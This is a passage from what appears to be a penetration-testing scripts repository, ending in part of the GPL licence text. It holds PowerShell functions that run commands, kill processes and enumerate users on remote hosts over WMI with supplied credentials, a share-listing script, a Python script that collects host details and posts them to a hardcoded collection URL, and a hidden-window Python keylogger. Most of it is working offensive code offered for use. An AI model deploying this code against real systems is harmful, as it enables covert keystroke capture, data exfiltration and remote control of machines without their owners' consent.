any command in the target's system path. 108 | 109 | .PARAMETER User 110 | Specify a username Default is the current user context. 111 | 112 | .PARAMETER Pass 113 | Specify the password for the appropriate user. 114 | 115 | .PARAMETER TARGETs 116 | Host or array of hosts to target. Can be a hostname, IP address, or FQDN. Default is set to localhost. 117 | 118 | .PARAMETER Command 119 | Specify the command that is executed on the targeted machine. 120 | 121 | .EXAMPLE 122 | > Invoke-WmiExecCommand -Command ping -n 4 192.168.1.1 123 | This pings the system at 192.168.1.1 with 4 ping requests from the local system 124 | 125 | .EXAMPLE 126 | > Invoke-WmiExecCommand -Command notepad.exe -User Chris -Pass password -Target chrispc 127 | This command authenticates to chrispc and starts notepad.exe 128 | 129 | .LINK 130 | https://github.com/xorrior/RandomPS-Scripts 131 | 132 | #> 133 | 134 | param 135 | ( 136 | #Parameter assignment 137 | [Parameter(Mandatory = $False)] 138 | [string]$User, 139 | [Parameter(Mandatory = $False)] 140 | [string]$Pass, 141 | [Parameter(Mandatory = $False)] 142 | [string[]]$Targets = ".", 143 | [Parameter(Mandatory = $True)] 144 | [string]$Command 145 | ) 146 | 147 | Begin 148 | { 149 | #Check if the TARGETS parameter was passed through the pipeline. Set the usedParameter variable to true. 150 | $usedParameter = $False 151 | if($PSBoundParameters.ContainsKey('TARGETS')) 152 | { 153 | $usedParameter = $True 154 | } 155 | } 156 | 157 | Process 158 | { 159 | #If targets is passed via the parameter, complete function for each host. 160 | if($usedParameter) 161 | { 162 | Foreach($computer in $TARGETS) 163 | { 164 | Invoke-WorkerWmiExecCommand -User "$User" -Pass "$Pass" -Targets "$computer" -Command "$Command" 165 | } 166 | } 167 | #Pass the value from the pipeline to the target parameter if the usedParameter variable is false. 168 | else 169 | { 170 | Invoke-WorkerWmiExecCommand -Command "$Command" 171 | } 172 | } 173 | 174 | end{} 175 | } 176 | 177 | 178 | function Invoke-WMIKillProcess 179 | { 180 | <# 181 | .SYNOPSIS 182 | This function is used to kill a process on either the local or a remote machine via a process name or ID. This requires local admin access wherever the command is to be executed. 183 | 184 | .DESCRIPTION 185 | This function is used to kill a process on either the local or a remote machine via a process name or ID. This requires local admin rights. 186 | 187 | .PARAMETER User 188 | Specify a username Default is the current user context. 189 | 190 | .PARAMETER Pass 191 | Specify the password for the appropriate user. 192 | 193 | .PARAMETER TARGETs 194 | Host or array of hosts to target. Can be a hostname, IP address, or FQDN. Default is set to localhost. 195 | 196 | .PARAMETER ProcessName 197 | Specify the name of the process that is to be killed on the targeted machine. 198 | 199 | .PARAMETER ProcessID 200 | Specify the process ID number that is to be killed on the targeted machine. 201 | 202 | .EXAMPLE 203 | > Invoke-WMIKillProcess -ProcessName notepad.exe 204 | This kills all processes with the name notepad.exe on the local machine 205 | 206 | .EXAMPLE 207 | > Invoke-WMIKillProcess -ProcessID 2048 -User Chris -Pass password -Target chrispc 208 | This command authenticates to chrispc and and attempts to kill the process with pid 2048. 209 | 210 | .LINK 211 | https://github.com/xorrior/RandomPS-Scripts 212 | #> 213 | 214 | param 215 | ( 216 | #Parameter assignment 217 | [Parameter(Mandatory = $False)] 218 | [string]$User, 219 | [Parameter(Mandatory = $False)] 220 | [string]$Pass, 221 | [Parameter(Mandatory = $False)] 222 | [string]$ProcessName, 223 | [Parameter(Mandatory = $False)] 224 | [string]$ProcessID, 225 | [Parameter(Mandatory = $False)] 226 | [string[]]$TARGETS = "." 227 | ) 228 | 229 | Begin 230 | { 231 | # Check if the TARGETS parameter was passed through the pipeline. Set the usedParameter variable to true. 232 | $usedParameter = $False 233 | if($PSBoundParameters.ContainsKey('TARGETS')) 234 | { 235 | $usedParameter = $True 236 | } 237 | } 238 | 239 | Process 240 | { 241 | # If targets is passed via the parameter, complete function for each host 242 | if($usedParameter) 243 | { 244 | if($ProcessName) 245 | { 246 | ForEach($computer in $TARGETS) 247 | { 248 | Invoke-WorkerWmiKillProcess -User "$User" -Pass "$Pass" -Targets "$computer" -ProcName $ProcessName 249 | } 250 | } 251 | 252 | elseif($ProcessID) 253 | { 254 | ForEach($computer in $TARGETS) 255 | { 256 | Invoke-WorkerWmiKillProcess -User "$User" -Pass "$Pass" -Targets "$computer" -ProcID $ProcessID 257 | } 258 | } 259 | 260 | else 261 | { 262 | Write-Verbose "You didn't provide a valid action to take! This script uses processid or processname!" 263 | } 264 | } 265 | 266 | #Pass the value from the pipeline to the target parameter if the usedParameter variable is false. 267 | else 268 | { 269 | if($ProcessName) 270 | { 271 | ForEach($computer in $TARGETS) 272 | { 273 | Invoke-WorkerWmiKillProcess -User "$User" -Pass "$Pass" -ProcName $ProcessName 274 | } 275 | } 276 | elseif($ProcessID) 277 | { 278 | ForEach($computer in $TARGETS) 279 | { 280 | Invoke-WorkerWmiKillProcess -User "$User" -Pass "$Pass" -ProcID $ProcessID 281 | } 282 | } 283 | else 284 | { 285 | Write-Verbose "You didn't provide a valid action to take! This script uses processid or processname!" 286 | } 287 | } 288 | } 289 | 290 | end{} 291 | } 292 | 293 | function Get-RunningProcesses 294 | { 295 | <# 296 | .SYNOPSIS 297 | TBA 298 | Some of this is from - http://blogs.technet.com/b/heyscriptingguy/archive/2009/12/10/hey-scripting-guy-december-10-2009.aspx 299 | .DESCRIPTION 300 | TBA 301 | .PARAMETER TBA 302 | .EXAMPLE 303 | TBA 304 | #> 305 | 306 | param 307 | ( 308 | #Parameter assignment 309 | [Parameter(Mandatory = $False)] 310 | [string]$User, 311 | [Parameter(Mandatory = $False)] 312 | [string]$Pass, 313 | [Parameter(Mandatory = $False)] 314 | [string[]]$TARGETS = "." 315 | ) 316 | 317 | if($User -and $Pass) 318 | { 319 | $password = ConvertTo-SecureString $Pass -asplaintext -force 320 | $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password 321 | Foreach($computer in $TARGETS) 322 | { 323 | Write-Verbose "Connecting to $computer" 324 | Get-WMIObject Win32_Process -Credential $cred -computername $computer | ForEach-Object { $_.ProcessName } | Sort-Object | Get-Unique 325 | } 326 | } 327 | 328 | else 329 | { 330 | Write-Verbose "Checking local system..." 331 | Get-WMIObject Win32_Process | ForEach-Object { $_.ProcessName } | Sort-Object | Get-Unique 332 | } 333 | } 334 | 335 | function Get-ProcessOwners 336 | { 337 | <# 338 | .SYNOPSIS 339 | TBA 340 | Some of this is from - http://blogs.technet.com/b/heyscriptingguy/archive/2009/12/10/hey-scripting-guy-december-10-2009.aspx 341 | .DESCRIPTION 342 | TBA 343 | .PARAMETER TBA 344 | .EXAMPLE 345 | TBA 346 | #> 347 | 348 | param 349 | ( 350 | #Parameter assignment 351 | [Parameter(Mandatory = $False)] 352 | [string]$User, 353 | [Parameter(Mandatory = $False)] 354 | [string]$Pass, 355 | [Parameter(Mandatory = $False)] 356 | [string[]]$TARGETS = "." 357 | ) 358 | 359 | if($User -and $Pass) 360 | { 361 | $password = ConvertTo-SecureString $Pass -asplaintext -force 362 | $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password 363 | Foreach($computer in $TARGETS) 364 | { 365 | Write-Verbose "Connecting to $computer" 366 | Get-WMIObject Win32_Process -Credential $cred -computername $computer | ForEach-Object { $owner = $_.GetOwner(); '{0}\{1}' -f $owner.Domain, $owner.User } | Sort-Object | Get-Unique 367 | } 368 | } 369 | 370 | else 371 | { 372 | Write-Verbose "Checking local system..." 373 | Get-WMIObject Win32_Process | ForEach-Object { $owner = $_.GetOwner(); '{0}\{1}' -f $owner.Domain, $owner.User } | Sort-Object | Get-Unique 374 | } 375 | } 376 | 377 | 378 | function Query-UsersActive 379 | { 380 | <# 381 | .SYNOPSIS 382 | TBA 383 | Some of this is from - http://www.activxperts.com/admin/scripts/wmi/powershell/0388/ 384 | .DESCRIPTION 385 | TBA 386 | .PARAMETER TBA 387 | .EXAMPLE 388 | TBA 389 | #> 390 | 391 | param 392 | ( 393 | #Parameter assignment 394 | [Parameter(Mandatory = $False)] 395 | [string]$User, 396 | [Parameter(Mandatory = $False)] 397 | [string]$Pass, 398 | [Parameter(Mandatory = $False)] 399 | [string[]]$TARGETS = "." 400 | ) 401 | 402 | if($User -and $Pass) 403 | { 404 | $password = ConvertTo-SecureString $Pass -asplaintext -force 405 | $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password 406 | Foreach($computer in $TARGETS) 407 | { 408 | # Need to add in filtering here to stop if a "true" has been found for screensavers being active 409 | Write-Verbose "Connecting to $computer" 410 | [string]$ScreenshotActive = Get-RunningProcesses -User $User -Pass $Pass -Targets $Targets | Select-String ".scr" 411 | [string]$LoginPrompt = Get-RunningProcesses -User $User -Pass $Pass -Targets $Targets | Select-String "LogonUI.exe" 412 | 413 | # If either returned true, we can assume the user is not active at their desktop 414 | if ($ScreenshotActive -or $LoginPrompt) 415 | { 416 | Write-Output "User is not present!" 417 | } 418 | else 419 | { 420 | Write-Output "User is at their desktop!" 421 | } 422 | } 423 | } 424 | 425 | else 426 | { 427 | Write-Verbose "Checking local system..." 428 | Get-WMIObject Win32_Desktop | ForEach-Object { $_.ScreenSaverActive } | Sort-Object | Get-Unique 429 | Get-WMIObject Win32_Process -filter 'name = "LogonUI.exe"' | ForEach-Object { $_.ProcessName } | Sort-Object | Get-Unique 430 | } 431 | } 432 | 433 | # location for managing shares - http://windowsitpro.com/powershell/managing-file-shares-windows-powershell 434 | # (Get-WmiObject Win32_Share -List).Create( "C:\Users\SonofFlynn\Downloads\apple", "testshare", 0 ) -------------------------------------------------------------------------------- /HostScripts/ProcessArchDetection/.vs/ProcessArchDetection/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ChrisTruncer/PenTestScripts/c55072952bfbe8d3890c981f5e6ddfa5123fe555/HostScripts/ProcessArchDetection/.vs/ProcessArchDetection/v16/.suo -------------------------------------------------------------------------------- /HostScripts/ProcessArchDetection/ProcessArchDetection.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D} 8 | Exe 9 | ProcessArchDetection 10 | ProcessArchDetection 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | x86 36 | bin\x86\Debug\ 37 | 38 | 39 | x86 40 | bin\x86\Release\ 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /HostScripts/ProcessArchDetection/ProcessArchDetection.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30907.101 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessArchDetection", "ProcessArchDetection.csproj", "{A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x86 = Debug|x86 12 | Release|Any CPU = Release|Any CPU 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Debug|x86.ActiveCfg = Debug|x86 19 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Debug|x86.Build.0 = Debug|x86 20 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Release|x86.ActiveCfg = Release|x86 23 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Release|x86.Build.0 = Release|x86 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {92FFFEC2-1E9A-47CA-9F1A-D83C2D48C9E5} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /HostScripts/ProcessArchDetection/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | 5 | namespace ProcessArchDetection 6 | { 7 | class Program 8 | { 9 | [DllImport("kernel32.dll", SetLastError = true)] 10 | private static extern bool IsWow64Process(IntPtr hProcess, out bool isWow64Process); 11 | [DllImport("kernel32.dll", SetLastError = true)] 12 | public static extern IntPtr OpenProcess( 13 | ProcessAccessFlags processAccess, 14 | bool bInheritHandle, 15 | int processId 16 | ); 17 | public static IntPtr OpenProcess(Process proc, ProcessAccessFlags flags) 18 | { 19 | return OpenProcess(flags, false, proc.Id); 20 | } 21 | [Flags] 22 | public enum ProcessAccessFlags : uint 23 | { 24 | All = 0x001F0FFF, 25 | Terminate = 0x00000001, 26 | CreateThread = 0x00000002, 27 | VirtualMemoryOperation = 0x00000008, 28 | VirtualMemoryRead = 0x00000010, 29 | VirtualMemoryWrite = 0x00000020, 30 | DuplicateHandle = 0x00000040, 31 | CreateProcess = 0x000000080, 32 | SetQuota = 0x00000100, 33 | SetInformation = 0x00000200, 34 | QueryInformation = 0x00000400, 35 | QueryLimitedInformation = 0x00001000, 36 | Synchronize = 0x00100000 37 | } 38 | static void Main(string[] args) 39 | { 40 | Process[] localAll = Process.GetProcesses(); 41 | foreach (Process checkProcArch in localAll) 42 | { 43 | IntPtr procHandle = OpenProcess(ProcessAccessFlags.All, false, checkProcArch.Id); 44 | IsWow64Process(procHandle, out bool isit64); 45 | Console.WriteLine("Name: " + checkProcArch.ProcessName); 46 | Console.WriteLine("Process ID: " + checkProcArch.Id); 47 | Console.WriteLine("Is it x86: " + isit64); 48 | Console.WriteLine("\n"); 49 | } 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /HostScripts/ProcessArchDetection/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ProcessArchDetection")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ProcessArchDetection")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("a253a6af-4d41-4c17-a25f-4ff97f9f8d9d")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /HostScripts/ShareDumper.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-ShareDumper 2 | { 3 | <# This function performs a recursive listing against all shares provided in a file #> 4 | param 5 | ( 6 | [Parameter(Mandatory = $True)] 7 | [string]$SharePath, 8 | [Parameter(Mandatory = $True)] 9 | [string]$FilePath 10 | ) 11 | 12 | Process 13 | { 14 | $sharelist = Get-Content $SharePath 15 | 16 | foreach ($path in $sharelist) 17 | { 18 | Write-Verbose "Parsing $path" 19 | if($FilePath) 20 | { 21 | $results += Get-ChildItem -ErrorAction SilentlyContinue -Recurse $path 22 | } 23 | else 24 | { 25 | Get-ChildItem -ErrorAction SilentlyContinue -Recurse $path 26 | } 27 | } 28 | if ($FilePath) 29 | { 30 | $results | Out-File $FilePath 31 | } 32 | } 33 | } -------------------------------------------------------------------------------- /HostScripts/enumeration.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This script enumerates information from the local system 4 | 5 | import ctypes 6 | import os 7 | import socket 8 | import string 9 | import subprocess 10 | import urllib2 11 | 12 | # URL - You obviously need to edit this, just the IP/domain 13 | url = "https://192.168.1.1/post_enum_data.php" 14 | 15 | # Enumerate IP addresses and hostname 16 | host, alias, ip = socket.gethostbyname_ex(socket.gethostname()) 17 | 18 | # Get full hostname (including domain if applicable) 19 | host = socket.getfqdn() 20 | 21 | # Enumerate system drives 22 | drive_space = {} 23 | drives = [] 24 | bitmask = ctypes.windll.kernel32.GetLogicalDrives() 25 | for letter in string.uppercase: 26 | if bitmask & 1: 27 | drives.append(letter) 28 | bitmask >>= 1 29 | 30 | # get username based off of environmental variable 31 | # might not be true, but probably us 32 | username = os.getenv('USERNAME') 33 | 34 | # Get space per drive 35 | for drive_letter in drives: 36 | free_bytes = ctypes.c_ulonglong(0) 37 | ctypes.windll.kernel32.GetDiskFreeSpaceExW( 38 | ctypes.c_wchar_p(drive_letter + ":"), None, None, ctypes.pointer( 39 | free_bytes)) 40 | free_megs = free_bytes.value / 1024 / 1024 41 | drive_space[drive_letter] = free_megs 42 | 43 | # Get running processes 44 | tasklist_output = subprocess.check_output("tasklist") 45 | 46 | data_to_transmit = "hostname - " + str(host) + "\nIP Address(es) - " + str(ip) + "\nSystem Drives and Free Space in Megs - " + str(drive_space) + "\nTasklist Output - " + tasklist_output 47 | 48 | # Post the data over https 49 | f = urllib2.urlopen(url, data_to_transmit) 50 | f.close() 51 | -------------------------------------------------------------------------------- /HostScripts/keylogger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import win32console 3 | import win32gui 4 | import pythoncom 5 | import pyHook 6 | 7 | # This is completely based off the code at this URL (with very minor mods) 8 | # https://github.com/blaz1988/keylogger/blob/master/keylogger.py 9 | 10 | win=win32console.GetConsoleWindow() 11 | win32gui.ShowWindow(win,0) 12 | 13 | def OnKeyboardEvent(event): 14 | if event.Ascii==5: 15 | _exit(1) 16 | if event.Ascii !=0 or 8: 17 | f=open('C:\Users\Christopher\Downloads\output.txt','r+') 18 | buffer=f.read() 19 | f.close() 20 | f=open('C:\Users\Christopher\Downloads\output.txt','w') 21 | keylogs=chr(event.Ascii) 22 | if event.Ascii==13: 23 | keylogs='/n' 24 | buffer+=keylogs 25 | f.write(buffer) 26 | f.close() 27 | f1 = open('C:\Users\Christopher\Downloads\output.txt', 'w') 28 | f1.write('Incoming keys:\n') 29 | f1.close() 30 | hm=pyHook.HookManager() 31 | hm.KeyDown=OnKeyboardEvent 32 | hm.HookKeyboard() 33 | pythoncom.PumpMessages() 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. {http://fsf.org/} 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that 